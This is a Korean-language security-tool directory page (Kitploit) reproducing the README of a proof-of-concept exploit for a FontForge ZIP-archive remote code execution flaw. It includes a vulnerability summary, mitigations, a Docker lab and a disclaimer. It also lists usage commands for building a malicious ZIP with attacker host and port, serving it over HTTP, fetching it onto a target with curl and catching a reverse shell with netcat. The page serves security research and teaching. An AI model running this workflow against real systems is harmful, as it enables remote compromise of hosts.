Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-25082 — CVE-2024-25082에 대한 개념 증명 익스플로잇입니다. 조작된 ZIP 아카이브를 통해 FontForge에서 원격 코드 실행을 시연합니다. 페이로드 생성기, Docker 랩 및 보안 연구 및 교육을 위한 기술 문서를 포함합니다. | Kitploit
도구/GitHubGitHub/moamenx8/cve-2024-25082
Payload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

CVE-2024-25082에 대한 개념 증명 익스플로잇입니다. 조작된 ZIP 아카이브를 통해 FontForge에서 원격 코드 실행을 시연합니다. 페이로드 생성기, Docker 랩 및 보안 연구 및 교육을 위한 기술 문서를 포함합니다.

저장소 보기
55개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ CVE-2024-25082 - FontForge ZIP 원격 코드 실행 (PoC)

License Python CVE

CVE-2024-25082에 대한 개념 증명 익스플로잇으로, 조작된 ZIP 아카이브를 통해 **원격 코드 실행(RCE)**을 허용하는 FontForge의 취약점입니다.

이 저장소는 통제된 실험실 환경에서 취약점이 어떻게 악용될 수 있는지 보안 연구 및 교육 목적으로 시연합니다.


취약점 개요

  • CVE ID: CVE-2024-25082\
  • 영향받는 소프트웨어: FontForge\
  • 취약점 유형: 원격 코드 실행\
  • 공격 벡터: 악성 ZIP 아카이브\
  • 영향: 조작된 아카이브가 처리될 때 임의의 명령 실행.

취약점은 ZIP 아카이브 내 파일에 대한 부적절한 검증으로 인해 발생하며, 공격자가 대상 시스템에서 임의의 명령을 실행할 수 있습니다.


저장소 구조

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

파일 설명


exploit.py 악성 ZIP 페이로드 생성 poc/ 생성된 개념 증명 파일 포함 writeup.md 취약점에 대한 기술적 설명 License


요구 사항

  • Python 3.x
  • Netcat

선택적 도구 설치:

root@kitploit:~
sudo apt install netcat

사용 방법

1️⃣ 악성 페이로드 생성

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

exploit.zip 악성 파일이 생성됩니다.


2️⃣ 익스플로잇 제공

root@kitploit:~
python3 -m http.server 8080

3️⃣ 대상 시스템에서 업로드

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ 리버스 셸 획득

root@kitploit:~
nc -lvnp <Your Port>

성공하면 대상 시스템에서 셸을 획득합니다.


취약점 재현

재현 가능한 취약 환경이 docker/ 디렉토리 내에 제공됩니다.

예시:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

이를 통해 프로덕션 시스템에 영향을 주지 않고 안전하게 테스트할 수 있습니다.


보안 영향

취약한 애플리케이션에 의해 처리되는 ZIP 파일을 업로드하거나 제어할 수 있는 공격자는 다음을 수행할 수 있습니다:

  • 임의의 시스템 명령 실행
  • 원격 셸 접근 획득
  • 호스트 시스템 손상

완화

권장 완화 조치:

  • 패치된 버전으로 FontForge 업데이트
  • 업로드된 아카이브 내용 검증
  • 파일 업로드 기능 제한
  • 글꼴 처리 시 샌드박싱 사용

면책 조항

이 저장소는 공개적으로 공개된 취약점에 대한 개념 증명 코드를 포함합니다.

코드는 다음 목적으로만 제공됩니다:

  • 보안 연구
  • 교육 목적
  • 승인된 침투 테스트

명시적 허가 없이 이 코드를 시스템에 사용하지 마십시오.

저자는 이 소프트웨어로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.


저자

Moamen Elmaghrabi

사이버보안 학생
침투 테스트 및 익스플로잇 개발


라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.
자세한 내용은 LICENSE 파일을 참조하십시오.

도구 다운로드